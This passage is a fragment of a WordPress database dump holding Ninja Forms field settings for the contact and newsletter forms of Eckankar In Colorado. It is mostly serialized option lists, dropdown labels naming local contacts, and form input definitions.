dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"Northwest\";s:5:\"value\";s:9:\"Northwest\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8831,224,'value','','value',''),(8832,225,'field_label','Last Name','field_label','Last Name'),(8833,225,'field_key','lastname_308','field_key','lastname_308'),(8834,225,'value','','value',''),(8835,226,'field_label','Email','field_label','Email'),(8836,226,'field_key','email_309','field_key','email_309'),(8837,226,'value','','value',''),(8838,227,'field_label','State','field_label','State'),(6225,216,'key','listselect_170','key','listselect_170'),(6226,216,'container_class','one-half first','container_class','one-half first'),(6227,216,'parent_id','20','parent_id','20'),(12266,381,'list','a:0:{}','list','a:0:{}'),(12265,381,'list_show_value','1','list_show_value','1'),(12264,381,'multi_size','5','multi_size','5'),(12263,381,'list_type','dropdown','list_type','dropdown'),(12262,381,'label_pos','above','label_pos','above'),(12261,381,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(12260,381,'label','Your Local Area','label','Your Local Area'),(12259,381,'type','listselect','type','listselect'),(12235,380,'admin_label','','admin_label',''),(12236,380,'user_info_field_group_name','','user_info_field_group_name',''),(12237,380,'user_info_field_group_custom','','user_info_field_group_custom',''),(12238,380,'show_desc','0','show_desc','0'),(12239,380,'desc_pos','none','desc_pos','none'),(12240,380,'desc_text','','desc_text',''),(12241,380,'element_class','','element_class',''),(12242,380,'required','1','required','1'),(12243,380,'key','phone_24','key','phone_24'),(12244,380,'default','','default',''),(12245,380,'container_class','one-half','container_class','one-half'),(12246,380,'manual_key','','manual_key',''),(12247,380,'custom_mask','','custom_mask',''),(12248,380,'parent_id','8','parent_id','8'),(12249,380,'idAttribute','id','idAttribute','id'),(12250,380,'field_label','Phone','field_label','Phone'),(12251,380,'field_key','phone_24','field_key','phone_24'),(12252,380,'custom_name_attribute','phone','custom_name_attribute','phone'),(12253,380,'personally_identifiable','1','personally_identifiable','1'),(12254,380,'value','','value',''),(12255,381,'objectType','Field','objectType','Field'),(12256,381,'objectDomain','fields','objectDomain','fields'),(12257,381,'editActive','','editActive',''),(12258,381,'order','5','order','5'),(6259,219,'objectType','Field','objectType','Field'),(6260,219,'objectDomain','fields','objectDomain','fields'),(6261,219,'editActive','','editActive',''),(6262,219,'order','7','order','7'),(6263,219,'type','listselect','type','listselect'),(6264,219,'label','Select The Person You Would Like To Contact','label','Select The Person You Would Like To Contact'),(6265,219,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(6266,219,'label_pos','above','label_pos','above'),(6267,219,'list_type','dropdown','list_type','dropdown'),(6268,219,'multi_size','5','multi_size','5'),(6269,219,'list_show_value','1','list_show_value','1'),(6270,219,'list','a:0:{}','list','a:0:{}'),(6271,219,'user_info_field_group','','user_info_field_group',''),(6272,219,'calc_auto_include','0','calc_auto_include','0'),(6273,219,'user_state','0','user_state','0'),(6274,219,'num_sort','0','num_sort','0'),(6275,219,'admin_label','','admin_label',''),(6276,219,'show_help','0','show_help','0'),(6277,219,'help_text','','help_text',''),(6278,219,'show_desc','0','show_desc','0'),(6279,219,'desc_pos','none','desc_pos','none'),(6280,219,'desc_text','','desc_text',''),(6281,219,'element_class','','element_class',''),(6282,219,'required','1','required','1'),(6283,219,'options','a:5:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:0;}i:1;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:1;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:22:\"Initiator-Pat Lafferty\";s:5:\"value\";s:22:\"initiator-pat-lafferty\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:2;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:30:\"ESA/Initiator-Melony Mont-Eton\";s:5:\"value\";s:30:\"ESA-Initiator-Melony Mont-Eton\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:24:\"Initiator-Mike Mont-Eton\";s:5:\"value\";s:24:\"Initiator-Mike Mont-Eton\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:3;}i:4;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";i:4;s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:28:\"ESA/Initiator-Kimberly Young\";s:5:\"value\";s:28:\"ESA/Initiator-Kimberly Young\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}}','options','a:5:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:0;}i:1;a:10:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:1;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:22:\"Initiator-Pat Lafferty\";s:5:\"value\";s:22:\"initiator-pat-lafferty\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:2;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:30:\"ESA/Initiator-Melony Mont-Eton\";s:5:\"value\";s:30:\"ESA-Initiator-Melony Mont-Eton\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:24:\"Initiator-Mike Mont-Eton\";s:5:\"value\";s:24:\"Initiator-Mike Mont-Eton\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:3;}i:4;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"order\";i:4;s:3:\"new\";s:0:\"\";s:7:\"options\";a:0:{}s:5:\"label\";s:28:\"ESA/Initiator-Kimberly Young\";s:5:\"value\";s:28:\"ESA/Initiator-Kimberly Young\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";s:1:\"1\";}}'),(8827,223,'field_label','Text','field_label','Text'),(8828,223,'field_key','html_306','field_key','html_306'),(8829,224,'field_label','First Name','field_label','First Name'),(8830,224,'field_key','textbox_307','field_key','textbox_307'),(6284,219,'key','select_the_person_you_would_like_to_contact_1613166807240','key','select_the_person_you_would_like_to_contact_1613166807240'),(6285,219,'container_class','one-half','container_class','one-half'),(6286,219,'drawerDisabled','','drawerDisabled',''),(6287,219,'parent_id','20','parent_id','20'),(6288,220,'objectType','Field','objectType','Field'),(6289,220,'objectDomain','fields','objectDomain','fields'),(6290,220,'editActive','','editActive',''),(6291,220,'order','8','order','8'),(6292,220,'type','textarea','type','textarea'),(6293,220,'label','Enter Your Message Here','label','Enter Your Message Here'),(6294,220,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(6295,220,'label_pos','above','label_pos','above'),(6296,220,'default_value','','default_value',''),(6297,220,'textarea_rte','0','textarea_rte','0'),(6298,220,'textarea_media','0','textarea_media','0'),(6299,220,'disable_rte_mobile','0','disable_rte_mobile','0'),(6300,220,'input_limit','','input_limit',''),(6301,220,'input_limit_type','char','input_limit_type','char'),(6302,220,'calc_auto_include','0','calc_auto_include','0'),(6303,220,'num_sort','0','num_sort','0'),(6304,220,'admin_label','','admin_label',''),(6305,220,'show_help','0','show_help','0'),(6306,220,'help_text','','help_text',''),(6307,220,'show_desc','0','show_desc','0'),(6308,220,'desc_pos','none','desc_pos','none'),(6309,220,'desc_text','','desc_text',''),(6310,220,'element_class','','element_class',''),(6311,220,'required','1','required','1'),(6312,220,'default','','default',''),(6313,220,'key','textarea_174','key','textarea_174'),(6314,220,'placeholder','','placeholder',''),(6315,220,'container_class','','container_class',''),(6316,220,'manual_key','','manual_key',''),(6317,220,'parent_id','20','parent_id','20'),(17437,618,'editActive','','editActive',''),(17436,617,'drawerDisabled','','drawerDisabled',''),(17435,617,'key','html_1663797718830','key','html_1663797718830'),(17434,617,'element_class','','element_class',''),(17433,617,'container_class','','container_class',''),(17432,617,'default','This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(6335,222,'objectType','Field','objectType','Field'),(6336,222,'objectDomain','fields','objectDomain','fields'),(6337,222,'editActive','','editActive',''),(6338,222,'order','10','order','10'),(6339,222,'type','submit','type','submit'),(6340,222,'label','Submit','label','Submit'),(6341,222,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(6342,222,'show_help','0','show_help','0'),(6343,222,'help_text','','help_text',''),(6344,222,'show_desc','0','show_desc','0'),(6345,222,'desc_pos','none','desc_pos','none'),(6346,222,'desc_text','','desc_text',''),(6347,222,'processing_label','Processing','processing_label','Processing'),(6348,222,'element_class','','element_class',''),(6349,222,'key','submit_176','key','submit_176'),(6350,222,'container_class','','container_class',''),(6351,222,'parent_id','20','parent_id','20'),(6352,223,'objectType','Field','objectType','Field'),(6353,223,'objectDomain','fields','objectDomain','fields'),(6354,223,'editActive','','editActive',''),(6355,223,'order','1','order','1'),(6356,223,'type','html','type','html'),(6357,223,'label','Text','label','Text'),(6358,223,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(6359,223,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado - Newsletter Signup</span></span></span></strong></span></h3>\r\nGet the latest news from around the state!','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado - Newsletter Signup</span></span></span></strong></span></h3>\r\nGet the latest news from around the 